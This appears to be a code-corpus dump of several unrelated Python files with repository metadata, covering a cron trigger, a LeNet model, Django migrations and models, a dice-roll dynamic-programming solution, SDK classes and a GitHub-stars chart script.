] | permissive | scottwedge/OpenStack-Stein | d25b2a5bb54a714fc23f0ff0c11fb1fdacad85e8 | 7077d1f602031dace92916f14e36b124f474de15 | refs/heads/master | 2021-03-22T16:07:19.561504 | 2020-03-15T01:31:10 | 2020-03-15T01:31:10 | 247,380,811 | 0 | 0 | Apache-2.0 | 2020-03-15T01:24:15 | 2020-03-15T01:24:15 | null | UTF-8 | Python | false | false | 1,856 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from croniter import croniter
from datetime import datetime
from oslo_utils import timeutils
from karbor import exception
from karbor.i18n import _
from karbor.services.operationengine.engine.triggers.timetrigger import \
timeformats
class Crontab(timeformats.TimeFormat):
    """Trigger time format driven by a crontab-style pattern."""

    def __init__(self, start_time, pattern):
        # Times earlier than start_time never produce a trigger.
        self._start_time = start_time
        self._pattern = pattern
        super(Crontab, self).__init__(start_time, pattern)

    @classmethod
    def check_time_format(cls, pattern):
        """Raise InvalidInput unless *pattern* is a parseable crontab string."""
        if not pattern:
            raise exception.InvalidInput(_("The trigger pattern is None"))
        try:
            croniter(pattern)
        except Exception:
            raise exception.InvalidInput(
                _("The trigger pattern(%s) is invalid") % pattern)

    def compute_next_time(self, current_time):
        """Return the first trigger time strictly after the given moment.

        The schedule never starts before ``self._start_time``.
        """
        base = max(current_time, self._start_time)
        return croniter(self._pattern, base).get_next(datetime)

    def get_min_interval(self):
        """Seconds between the next two trigger times, or None on failure."""
        try:
            first = self.compute_next_time(datetime.now())
            second = self.compute_next_time(first)
            return timeutils.delta_seconds(first, second)
        except Exception:
            # Best effort: callers treat None as "interval unknown".
            return None
| [
"Wayne Gong@minbgong-winvm.cisco.com"
] | Wayne Gong@minbgong-winvm.cisco.com |
f89a2a68338f83f4a881cb9afc97f86862752b31 | 0a08829b3327ecf180c72c03d0ba76d5ce118ae6 | /src/traffic_sign_classifier/model.py | da8623a2702b2c8fe677c5160aeab1dc25f0a117 | [] | no_license | ajunlonglive/self-driving-vehicle | 3ce2b83a642a7fc148288e12da9689592078a678 | a66746dea5448dcb175ab85a0a46ef60a09d185e | refs/heads/master | 2023-05-14T05:46:01.490492 | 2020-05-26T06:03:30 | 2020-05-26T06:03:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,388 | py | import numpy as np
import tensorflow as tf
from tensorflow.keras import layers
def dataset_pipeline(images, labels, input_fn, params, mode="train"):
    """Build a tf.data pipeline over (image, label, num_classes) triples.

    In "train" mode the dataset is repeated for params["epochs"] epochs,
    reshuffled every iteration, and batched; any other mode only batches.
    """
    class_counts = tf.constant(
        np.repeat(params["num_classes"], len(images)).astype(np.int32),
        dtype=tf.int32,
    )
    # Sanity check: one label and one class-count entry per image.
    tf.assert_equal(
        tf.shape(images)[0], tf.shape(labels)[0], tf.shape(class_counts)[0]
    )
    buffer_size = np.int32(images.shape[0])
    with tf.name_scope("input_pipeline"):
        dataset = tf.data.Dataset.from_tensor_slices(
            (images, labels, class_counts)
        )
        # Map before batching so input_fn receives individual examples.
        dataset = dataset.map(input_fn, num_parallel_calls=2)
        if mode != "train":
            return dataset.batch(params["batch_size"])
        return (
            dataset.repeat(params["epochs"])
            .shuffle(buffer_size=buffer_size, reshuffle_each_iteration=True)
            .batch(params["batch_size"])
        )
class LeNet(tf.Module):
    """LeNet-style CNN: two conv/max-pool stages followed by dense layers.

    NOTE(review): bn1, bn2, and dense2 are constructed in __init__ but are
    never applied in __call__ (the original had those calls commented out).
    They are kept so the attribute layout — and any existing checkpoints or
    variable collections — remain compatible; confirm before removing.
    """

    def __init__(self, num_classes):
        """Create all layers; `num_classes` sets the logits dimension."""
        self.conv1 = layers.Conv2D(filters=6, kernel_size=(5, 5), strides=1, activation="relu")
        self.bn1 = layers.BatchNormalization()  # unused in __call__, see class note
        self.pool1 = layers.MaxPool2D(pool_size=(2, 2), strides=(2, 2))
        self.conv2 = layers.Conv2D(filters=16, kernel_size=(5, 5), strides=1, activation="relu")
        self.bn2 = layers.BatchNormalization()  # unused in __call__, see class note
        self.pool2 = layers.MaxPool2D(pool_size=(2, 2), strides=(2, 2))
        self.flatten = layers.Flatten()
        self.dense = layers.Dense(120, activation="relu")
        self.dense2 = layers.Dense(84, activation="relu")  # unused in __call__, see class note
        self.logits = layers.Dense(num_classes)

    def __call__(self, features):
        """Return unnormalized class logits for a batch of images."""
        out = self.conv1(features)
        out = self.pool1(out)
        out = self.conv2(out)
        out = self.pool2(out)
        out = self.flatten(out)
        out = self.dense(out)
        out = self.logits(out)
        return out
| [
"sardhendumishra@gmail.com"
] | sardhendumishra@gmail.com |
bed7c0f2544d7469900ac7b0c9d6a9378ac8d8be | b26772a7ac736f5454815567817feda20d690363 | /source/lists/migrations/0005_translationslist_language.py | 0dec92a3e658e3b07c63c711cf39fead34de7222 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | mverleg/WW | 3f49e4be411a6203951fccf6f967f8164b988d09 | b58a9bbfc91d19541840f490ed59997d85389c0a | refs/heads/master | 2021-01-10T06:53:22.004564 | 2015-09-23T21:28:13 | 2015-09-23T21:28:13 | 54,189,553 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 659 | py | # -*- coding: utf-8 -*-
from django.db import models, migrations
class Migration(migrations.Migration):
    # Auto-generated Django migration: adds an optional `language` choice
    # field to TranslationsList (blank/null means a mixed-language list).

    dependencies = [
        ('lists', '0004_more_help_text'),
    ]

    operations = [
        migrations.AddField(
            model_name='translationslist',
            name='language',
            field=models.CharField(blank=True, max_length=8, null=True, help_text=b'You can select the language to learn for this list, or leave it blank for a mixed-language list.', choices=[(b'en-gb', 'English (British)'), (b'zh-cn', 'Chinese (simplified Mandarin)'), (b'de', 'German'), (b'nl', 'Dutch')]),
            preserve_default=True,
        ),
    ]
| [
"mark@rafiki"
] | mark@rafiki |
4113f46b5b98d26a87750e2dfe93b09c474d84ff | 8fbd17c39db677b91442f6e26d7e760d8296c064 | /chapter_11/fmnist_momentum.py | 9e6f464027c6e5af29db09ee0772ea3f11d7c188 | [
"MIT"
] | permissive | a1ip/MathForDeepLearning | 869172a36292a77195d28ffee23281e25a0440e3 | 8db1a85ce3cef4b48aab01ebe156e3fab2dfa271 | refs/heads/main | 2023-09-02T13:17:54.098315 | 2021-10-24T13:40:26 | 2021-10-24T13:40:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,507 | py | #
# file: fmnist_momentum.py
#
# Train and test the small 14x14 FMNIST dataset.
#
# RTK, 03-Feb-2021
# Last update: 19-Feb-2021
#
################################################################
from sklearn.metrics import matthews_corrcoef
import numpy as np
from NNm import *
# Load, reshape, and scale the data
# Pixel values are scaled from [0, 255] into [0, 1].
x_train = np.load("../dataset/fmnist_train_images_small.npy")/255
x_test = np.load("../dataset/fmnist_test_images_small.npy")/255
y_train = np.load("../dataset/fmnist_train_labels_vector.npy")
y_test = np.load("../dataset/fmnist_test_labels.npy")
# Flatten each 14x14 image into a (1, 196) row vector per sample.
x_train = x_train.reshape(x_train.shape[0], 1, 14*14)
x_test = x_test.reshape(x_test.shape[0], 1, 14*14)

# Build the network using sigmoid activations
# NOTE(review): Network/FullyConnectedLayer/ActivationLayer come from the
# wildcard `from NNm import *` above — confirm against NNm.py.
net = Network(verbose=True)
net.add(FullyConnectedLayer(14*14, 100, momentum=0.9))
net.add(ActivationLayer())
net.add(FullyConnectedLayer(100, 50, momentum=0.9))
net.add(ActivationLayer())
net.add(FullyConnectedLayer(50, 10, momentum=0.9))
net.add(ActivationLayer())

# Loss and train
net.fit(x_train, y_train, minibatches=40000, learning_rate=0.2)

# Build the confusion matrix using the test set predictions
out = net.predict(x_test)
pred = np.array(out)[:,0,:]
cm = np.zeros((10,10), dtype="uint32")
for i in range(len(y_test)):
    # Row = true label, column = predicted label (argmax of the outputs).
    cm[y_test[i],np.argmax(out[i])] += 1

# Show the results
print()
print(np.array2string(cm))
print()
print("accuracy = %0.7f" % (np.diag(cm).sum() / cm.sum(),))
print("MCC = %0.7f" % matthews_corrcoef(y_test, np.argmax(pred, axis=1)))
print()
| [
"oneelkruns@hotmail.com"
] | oneelkruns@hotmail.com |
cb9a8d46b6e83034c5f9c0d66e55bdebe20adcc4 | d191a04a3ded41175ea84ae88ebddb4f262b7fb1 | /Dynamic_program/47_dice_roll_simulation.py | 21a976620079f907ec469158fee53ad284a8bf02 | [] | no_license | YLyeliang/now_leet_code_practice | ae4aea945bae72ec08b11e57a8f8a3e81e704a54 | 204d770e095aec43800a9771fe88dd553463d2f7 | refs/heads/master | 2022-06-13T20:22:51.266813 | 2022-05-24T05:29:32 | 2022-05-24T05:29:32 | 205,753,056 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,641 | py | # A die simulator generates a random number from 1 to 6 for each roll. You introduced a constraint to the generator
# such that it cannot roll the number i more than rollMax[i] (1-indexed) consecutive times.
#
# Given an array of integers rollMax and an integer n, return the number of distinct sequences that can be obtained
# with exact n rolls.
#
# Two sequences are considered different if at least one element differs from each other. Since the answer may be too
# large, return it modulo 10^9 + 7.
#
#
#
# Example 1:
#
# Input: n = 2, rollMax = [1,1,2,2,2,3]
# Output: 34
# Explanation: There will be 2 rolls of die, if there are no
# constraints on the die, there are 6 * 6 = 36 possible combinations. In this case, looking at rollMax array,
# the numbers 1 and 2 appear at most once consecutively, therefore sequences (1,1) and (2,2) cannot occur,
# so the final answer is 36-2 = 34.
# Example 2:
#
# Input: n = 2, rollMax = [1,1,1,1,1,1]
# Output: 30
# Example 3:
#
# Input: n = 3, rollMax = [1,1,1,2,2,3]
# Output: 181
#
# Constraints:
#
# 1 <= n <= 5000
# rollMax.length == 6
# 1 <= rollMax[i] <= 15
# 问题:有一个骰子模拟器会每次投掷的时候生成一个 1 到 6 的随机数。
# 不过我们在使用它时有个约束,就是使得投掷骰子时,连续掷出数字i的次数不能超过 rollMax[i](i 从 1 开始编号)。
# 给定rollMax和n,返回用n次投掷得到的不同点数序列的数目;
# 假如两个序列中至少存在一个元素不同,就认为这两个序列是不同的。
# 分析:以n=3为例,扔第一次时,i=1,6种情况.假设dp[i][j]为扔i次时以j结尾时的情况
# i=2, 由于rollMax[0,1,2]为1,则不能出现11,22,33的情况,而对于以1结尾的情况为y1,y为非1的数,共5种情况。 对于以4结尾的,则有x4,共6种。
# 则可以得到dp[2][1,2,3]=5, dp[2][4,5,6]=6, dp[2][7] = sum(dp[2]) = 33
# i=3,对于以1结尾的,则有xy1,x为1-6,y为非1数。考虑到dp[2]有33种分布,而在i=2时,以1结尾的情况dp[2][1]有5种,则dp[3][1]=dp[2]-dp[2][1]
# dp[3][1] = dp[3-1] - dp[3-1][1]
# 以另一个例子, i=5, rollMax[5] = 3,以5结尾的情况有如下几种:
# xxxy5
# xxy55
# xy555
# 这几种情况分别对应 而dp[4]的所有情况包含了上述三种情况,现在只要减去不满足上面的情况即可。dp[5][5] = dp[4] - dp[4][5] +dp[3] - dp[3][5] + ...
# 其中dp[4]包含了xxxx的情况,dp[4] - dp[4][5]即 减去xxx5,也就是xxx55的情况,
from typing import List
class Solution:
    def dieSimulator(self, n: int, rollMax: List[int]) -> int:
        """Count distinct sequences of n die rolls, modulo 10^9 + 7.

        Face j (0-based) may never appear more than rollMax[j] times in a
        row. dp[i][j] counts valid i-roll sequences ending with face j;
        dp[i][faces] is the row total over all faces.

        Improvement over the original: the modulus is applied during the
        DP accumulation instead of only on the final value, so intermediate
        entries stay bounded instead of growing into huge big-integers for
        large n (the constraint allows n up to 5000).
        """
        MOD = 10**9 + 7
        faces = len(rollMax)
        dp = [[0] * (faces + 1) for _ in range(n + 1)]
        # Zero rolls: exactly one (empty) sequence.
        dp[0][faces] = 1
        # One roll: one sequence per face.
        for j in range(faces):
            dp[1][j] = 1
        dp[1][faces] = faces
        for i in range(2, n + 1):
            for j in range(faces):
                # A run of face j of length k (1 <= k <= rollMax[j]) must be
                # preceded by a sequence that does NOT end in face j, hence
                # the (total - ending-in-j) term. Python's % keeps the
                # result non-negative even after the subtraction.
                for k in range(1, rollMax[j] + 1):
                    if i - k < 0:
                        break
                    dp[i][j] = (dp[i][j] + dp[i - k][faces] - dp[i - k][j]) % MOD
                dp[i][faces] = (dp[i][faces] + dp[i][j]) % MOD
        return dp[n][faces] % MOD
| [
"k87974@163.com"
] | k87974@163.com |
4c9a02b5409c94b1bb4ea0e3c04bac9a3ea27a01 | a2d36e471988e0fae32e9a9d559204ebb065ab7f | /huaweicloud-sdk-gsl/huaweicloudsdkgsl/v3/model/show_real_named_response.py | a878e053144f5e24e1385f5992007dfc2351944c | [
"Apache-2.0"
] | permissive | zhouxy666/huaweicloud-sdk-python-v3 | 4d878a90b8e003875fc803a61414788e5e4c2c34 | cc6f10a53205be4cb111d3ecfef8135ea804fa15 | refs/heads/master | 2023-09-02T07:41:12.605394 | 2021-11-12T03:20:11 | 2021-11-12T03:20:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,870 | py | # coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class ShowRealNamedResponse(SdkResponse):
    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # NOTE: auto-generated SDK response model; prefer regenerating over
    # hand-editing this class.

    # Attribute names whose values are masked as "****" by to_dict().
    sensitive_list = []

    openapi_types = {
        'iccid': 'str',
        'real_named': 'bool'
    }

    attribute_map = {
        'iccid': 'iccid',
        'real_named': 'real_named'
    }

    def __init__(self, iccid=None, real_named=None):
        """ShowRealNamedResponse - a model defined in huaweicloud sdk"""
        super(ShowRealNamedResponse, self).__init__()

        self._iccid = None
        self._real_named = None
        self.discriminator = None

        # Only assign through the property setters when a value was given,
        # so unset attributes stay None.
        if iccid is not None:
            self.iccid = iccid
        if real_named is not None:
            self.real_named = real_named

    @property
    def iccid(self):
        """Gets the iccid of this ShowRealNamedResponse.

        ICCID

        :return: The iccid of this ShowRealNamedResponse.
        :rtype: str
        """
        return self._iccid

    @iccid.setter
    def iccid(self, iccid):
        """Sets the iccid of this ShowRealNamedResponse.

        ICCID

        :param iccid: The iccid of this ShowRealNamedResponse.
        :type: str
        """
        self._iccid = iccid

    @property
    def real_named(self):
        """Gets the real_named of this ShowRealNamedResponse.

        Whether real-name verification has been completed: true means yes,
        false means no.

        :return: The real_named of this ShowRealNamedResponse.
        :rtype: bool
        """
        return self._real_named

    @real_named.setter
    def real_named(self, real_named):
        """Sets the real_named of this ShowRealNamedResponse.

        Whether real-name verification has been completed: true means yes,
        false means no.

        :param real_named: The real_named of this ShowRealNamedResponse.
        :type: bool
        """
        self._real_named = real_named

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        # Recurse into lists, nested models, and dicts; mask sensitive
        # attributes; copy everything else verbatim.
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                if attr in self.sensitive_list:
                    result[attr] = "****"
                else:
                    result[attr] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        import simplejson as json
        # Python 2 only: force UTF-8 so non-ASCII payloads serialize cleanly.
        if six.PY2:
            import sys
            reload(sys)
            sys.setdefaultencoding("utf-8")
        return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)

    def __repr__(self):
        """For `print`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, ShowRealNamedResponse):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
e0fd8a8d176a8e39489490cca6af92f2274b1118 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_285/ch34_2019_06_03_00_25_27_762087.py | f2819fd0219c42be675bd7d5afd0366d356bc55b | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256 | py | deposito= float(input("depósito inicial: "))
taxa= float(input("taxa de juros: "))
total=0
mes=1
contador=0
# NOTE(review): the loop body runs 25 times (contador 0..24) — confirm the
# exercise really wants 25 deposits rather than 24.
while contador<=24:
    # NOTE(review): `mes` starts at 1, so the first iteration adds an extra
    # 1 to the compounded balance; looks unintended — verify against the
    # exercise statement.
    mes+=deposito*(1+taxa)
    deposito=mes
    # NOTE(review): this prints the literal string '.2f' as a second
    # argument; formatting such as f"{mes:.2f}" was presumably intended.
    print(mes, '.2f')
    contador+=1
    total+=deposito*taxa
print(total, '.2f') | [
"you@example.com"
] | you@example.com |
7216333c302abb5b4fec775da03c1c66a1cae875 | e42a61b7be7ec3412e5cea0ffe9f6e9f34d4bf8d | /a10sdk/core/rate/rate_limit.py | 929ad6636bdb4d3038f3d89fee75dae645facb41 | [
"Apache-2.0"
] | permissive | amwelch/a10sdk-python | 4179565afdc76cdec3601c2715a79479b3225aef | 3e6d88c65bd1a2bf63917d14be58d782e06814e6 | refs/heads/master | 2021-01-20T23:17:07.270210 | 2015-08-13T17:53:23 | 2015-08-13T17:53:23 | 40,673,499 | 0 | 0 | null | 2015-08-13T17:51:35 | 2015-08-13T17:51:34 | null | UTF-8 | Python | false | false | 1,402 | py | from a10sdk.common.A10BaseClass import A10BaseClass
class RateLimit(A10BaseClass):
    
    """ :param maxPktNum: {"description": "Max number of packets", "format": "number", "default": 10000, "optional": true, "maximum": 100000, "minimum": 1000, "type": "number"}
    :param rl_type: {"optional": true, "enum": ["ctrl"], "type": "string", "description": "'ctrl': The max number of packets that can be sent to kernel in 100ms; ", "format": "enum"}
    :param uuid: {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}
    :param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`

    Class Description::
    Rate limit configuration.

    Class rate-limit supports CRUD Operations and inherits from `common/A10BaseClass`.
    This class is the `"PARENT"` class for this module.`

    URL for this object::
    `https://<Hostname|Ip address>//axapi/v3/rate-limit`.
    """

    # NOTE: generated SDK wrapper — field metadata lives in the docstring above.
    def __init__(self, **kwargs):
        self.ERROR_MSG = ""
        self.required=[]
        self.b_key = "rate-limit"
        self.a10_url="/axapi/v3/rate-limit"
        self.DeviceProxy = ""
        self.maxPktNum = ""
        self.rl_type = ""
        self.uuid = ""

        # Any keyword argument overrides the matching default attribute.
        for keys, value in kwargs.items():
            setattr(self,keys, value)
| [
"doug@parksidesoftware.com"
] | doug@parksidesoftware.com |
824b24517c09d539722766485dba21e97ce02513 | c2a03f1cdc338c9078534d8eb2213b214a251e73 | /Pollapp/models.py | 1f700be8d88cd216b815efd7141c4ea87d9d0ca1 | [] | no_license | risification/onlinde_test | 9a2db6a945734cc74ee8bc8408ac0ce39fa9d3b3 | 3e1e7e5aca4fa59db08f6394c85ce00652c0871b | refs/heads/master | 2023-03-14T08:24:53.574738 | 2021-03-05T17:22:08 | 2021-03-05T17:22:08 | 344,850,651 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 723 | py | from django.db import models
from datetime import date
# Create your models here.
class Poll(models.Model):
    # A quiz/poll; `points` accumulates the score earned on it.
    name = models.CharField(max_length=30)
    # Set once when the row is created (auto_now_add).
    date = models.DateField(auto_now_add=True)
    points = models.IntegerField(default=0)
class Question(models.Model):
    # A question belonging to one Poll; deleted together with its poll.
    poll = models.ForeignKey(Poll, on_delete=models.CASCADE)
    title = models.CharField(max_length=50)
    # The correct answer text this question is checked against.
    true_answer = models.CharField(max_length=30)
class ChoiceAnsw(models.Model):
    # One selectable answer option offered for a Question.
    question = models.ForeignKey(Question, on_delete=models.CASCADE)
    choice = models.CharField(max_length=40)
class Answer(models.Model):
    # An answer submitted for a Question.
    question = models.ForeignKey(Question, on_delete=models.CASCADE)
    answer = models.CharField(max_length=30)
| [
"sultangaziev01@bk.ru"
] | sultangaziev01@bk.ru |
df168a8023119311931f1cfac20f2fad47c90e2e | 19fa45bfc16ba8c4856c0c4de8a9491714e77c3c | /PythonLearningDemo/python_repos.py | a9c7a3f44e41344106bc87e5940b77fd2afdb8fc | [] | no_license | JoyUCUU/QA | 046971d84d13b75155b91201267f7374e93d30cf | acff032c481be1483e05cf478bb6f07039c4048f | refs/heads/master | 2021-01-18T12:54:46.219302 | 2018-07-23T12:10:59 | 2018-07-23T12:10:59 | 84,333,986 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,517 | py | import requests
import requests
import pygal
from pygal.style import LightColorizedStyle as LCS,LightenStyle as LS
# Execute the API call (GitHub search, most-starred Python repos).
url = 'https://api.github.com/search/repositories?q=language:python&sort=stars'
r = requests.get(url)
print("Status Code: " ,r.status_code)

# Store the API response in a variable.
response_dict = r.json()
print("Total repositories:",response_dict['total_count'])

# Explore information about the repositories.
repo_dicts = response_dict['items']
print("Repositories returned:",len(repo_dicts))

# For each repo collect its name plus a pygal bar descriptor
# (value = stars, xlink = repo URL, label = description tooltip).
names,plot_dicts = [],[]
for repo_dict in repo_dicts:
    names.append(repo_dict['name'])
    plot_dict = dict(value=repo_dict['stargazers_count'], xlink=repo_dict['html_url'], label=repo_dict['description'])
    plot_dicts.append(plot_dict)

# names,stars = [],[]
# for repo_dict in repo_dicts:
#     names.append(repo_dict['name'])
#     stars.append(repo_dict['stargazers_count'])

# Visualization: styled bar chart rendered to an SVG file.
my_style = LS('#333366',base_style=LCS)
chart = pygal.Bar(style = my_style,x_label_rotation = 45,show_legend = False)
chart.title = "Most-starred Python Project on GitHub"
chart.x_labels = names
chart.add('',plot_dicts)
chart.render_to_file('python_repos1.svg')

# Examine the first repository.
#repo_dict = repo_dicts[0]
# for repo_dict in repo_dicts:
#     print('\nName:',repo_dict['name'])
#     print('Owner:',repo_dict['owner']['login'])
#     print('Stars:',repo_dict['stargazers_count'])
#     print('Repository',repo_dict['html_url'])
| [
"your_email@youremail.com"
] | your_email@youremail.com |
b0162723ed29495537ea9a9eec04cca7e4c319e7 | 3a533d1503f9a1c767ecd3a29885add49fff4f18 | /saleor/graphql/tax/tests/queries/test_tax_configuration.py | 73297b2699c9d21b07e645750f303df73f7fd48c | [
"BSD-3-Clause"
] | permissive | jonserna/saleor | 0c1e4297e10e0a0ce530b5296f6b4488f524c145 | b7d1b320e096d99567d3fa7bc4780862809d19ac | refs/heads/master | 2023-06-25T17:25:17.459739 | 2023-06-19T14:05:41 | 2023-06-19T14:05:41 | 186,167,599 | 0 | 0 | BSD-3-Clause | 2019-12-29T15:46:40 | 2019-05-11T18:21:31 | TypeScript | UTF-8 | Python | false | false | 3,467 | py | import graphene
from saleor.tax.models import TaxConfiguration
from ....tests.utils import assert_no_permission, get_graphql_content
from ..fragments import TAX_CONFIGURATION_FRAGMENT
QUERY = (
"""
query TaxConfiguration($id: ID!) {
taxConfiguration(id: $id) {
...TaxConfiguration
}
}
"""
+ TAX_CONFIGURATION_FRAGMENT
)
def _test_field_resolvers(tax_configuration: TaxConfiguration, data: dict):
    """Assert that the GraphQL payload mirrors the TaxConfiguration model."""
    exceptions = tax_configuration.country_exceptions.all()
    first_exception = exceptions[0]

    expected_id = graphene.Node.to_global_id(
        "TaxConfiguration", tax_configuration.pk
    )
    assert data["id"] == expected_id
    assert data["chargeTaxes"] == tax_configuration.charge_taxes
    assert data["displayGrossPrices"] == tax_configuration.display_gross_prices
    assert data["pricesEnteredWithTax"] == tax_configuration.prices_entered_with_tax

    countries = data["countries"]
    assert len(countries) == len(exceptions)
    head = countries[0]
    assert head["country"]["code"] == first_exception.country.code
    assert head["chargeTaxes"] == first_exception.charge_taxes
    assert head["displayGrossPrices"] == first_exception.display_gross_prices
def test_tax_configuration_query_no_permissions(channel_USD, user_api_client):
    """A plain user without permissions must be denied the query."""
    # given
    # Renamed from `id`, which shadowed the builtin of the same name.
    config_id = graphene.Node.to_global_id(
        "TaxConfiguration", channel_USD.tax_configuration.pk
    )
    variables = {"id": config_id}

    # when
    response = user_api_client.post_graphql(QUERY, variables, permissions=[])

    # then
    assert_no_permission(response)
def test_tax_configuration_query_staff_user(channel_USD, staff_api_client):
    """A staff user can query the channel's tax configuration."""
    # given
    # Renamed from `id`, which shadowed the builtin of the same name.
    config_id = graphene.Node.to_global_id(
        "TaxConfiguration", channel_USD.tax_configuration.pk
    )
    variables = {"id": config_id}

    # when
    response = staff_api_client.post_graphql(QUERY, variables)

    # then
    content = get_graphql_content(response)
    _test_field_resolvers(
        channel_USD.tax_configuration, content["data"]["taxConfiguration"]
    )
def test_tax_configuration_query_app(channel_USD, app_api_client):
    """An app client can query the channel's tax configuration."""
    # given
    # Renamed from `id`, which shadowed the builtin of the same name.
    config_id = graphene.Node.to_global_id(
        "TaxConfiguration", channel_USD.tax_configuration.pk
    )
    variables = {"id": config_id}

    # when
    response = app_api_client.post_graphql(QUERY, variables)

    # then
    content = get_graphql_content(response)
    _test_field_resolvers(
        channel_USD.tax_configuration, content["data"]["taxConfiguration"]
    )
TAX_CONFIGURATION_PRIVATE_METADATA_QUERY = """
query TaxConfiguration($id: ID!) {
taxConfiguration(id: $id) {
id
privateMetadata {
key
value
}
}
}
"""
def test_tax_class_private_metadata_requires_manage_taxes_app(
    app_api_client, channel_USD, permission_manage_taxes
):
    """An app holding MANAGE_TAXES can read the private metadata."""
    # given
    # Renamed from `id`, which shadowed the builtin of the same name.
    config_id = graphene.Node.to_global_id(
        "TaxConfiguration", channel_USD.tax_configuration.pk
    )
    variables = {"id": config_id}

    # when
    response = app_api_client.post_graphql(
        TAX_CONFIGURATION_PRIVATE_METADATA_QUERY,
        variables,
        permissions=[permission_manage_taxes],
    )

    # then
    content = get_graphql_content(response)
    data = content["data"]["taxConfiguration"]
    assert data["id"] == graphene.Node.to_global_id(
        "TaxConfiguration", channel_USD.tax_configuration.pk
    )
    assert data["privateMetadata"]
| [
"noreply@github.com"
] | jonserna.noreply@github.com |
923fbbb3366566898a71cf15294ef39fc1dc4139 | 6d0f6cc613c6f1a61b787c8cc1ef9a20895be40c | /django-cielo-exemplo/apps/carrinho/cart.py | 2568e3f07c18169eeefc6fa2e5797e2ed6b0e6dc | [
"Apache-2.0"
] | permissive | vitorh45/django-ecommerce-exemplo1 | 7f3f4887a118439b8de305044392e9baa381cf23 | c033ff2eca70230f676f8bd95d0bd5ecd89948a4 | refs/heads/master | 2016-09-15T18:42:38.600694 | 2013-09-08T05:23:26 | 2013-09-08T05:23:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,958 | py | # -*- coding: utf-8 -*-
import datetime
import models
from django.utils.formats import number_format
from apps.cart import Cart as Cart_
from apps.cart.models import Cart, Item
class CustomCart(Cart_):
    """Cart subclass handling product/size line items and BRL formatting.

    NOTE(review): the methods refer both to ``self.cart`` and
    ``self.carrinho`` (and to ``item.product`` vs ``item.produto``); which
    attribute/field names the base Cart class and Item model actually
    provide cannot be confirmed from this file — verify before unifying.
    """

    def add(self, product, size, quantity=1):
        """Add `quantity` of (product, size), merging with an existing item."""
        try:
            item = models.Item.objects.get(
                cart=self.cart,
                product=product,
                size=size,
            )
            item.quantity += quantity
            item.save()
        except models.Item.DoesNotExist:
            item = models.Item()
            item.cart = self.cart
            item.product = product
            item.quantity = quantity
            item.size = size
            if product.em_promocao:
                item.unity_price = product.preco_promocao
            else:
                # Fixed: was `produto.preco` — `produto` is undefined here
                # (the parameter is `product`), raising NameError at runtime.
                item.unity_price = product.preco
            item.save()

    def verificar_quantidade(self, produto, tamanho):
        """Return the stored quantity of (produto, tamanho), or 0 if absent."""
        try:
            item = models.Item.objects.get(carrinho=self.carrinho, produto=produto, tamanho=tamanho)
            return item.quantidade
        except:
            # NOTE(review): the bare except also hides field-name errors;
            # narrow to models.Item.DoesNotExist once the lookup keyword
            # names above are confirmed.
            return 0

    def preco_total(self):
        """Sum of the items' total prices."""
        total = 0
        for item in models.Item.objects.select_related().filter(carrinho=self.carrinho):
            total += item.preco_total
        return total

    def preco_total_formatado(self):
        """Total price formatted with two decimal places (locale-aware)."""
        total = 0
        for item in models.Item.objects.select_related().filter(carrinho=self.carrinho):
            total += item.preco_total
        return number_format(total, 2)

    def peso_total(self):
        """Total weight: sum of product weight times quantity."""
        total = 0
        for item in models.Item.objects.select_related().filter(carrinho=self.carrinho):
            total += item.product.peso * item.quantity
        return total

    def quantidade(self):
        """Number of distinct line items in the cart."""
        quantidade = len(self.cart.item_set.all())
        # Fixed: the computed value was never returned (method returned None).
        return quantidade
| [
"vitorh45@gmail.com"
] | vitorh45@gmail.com |
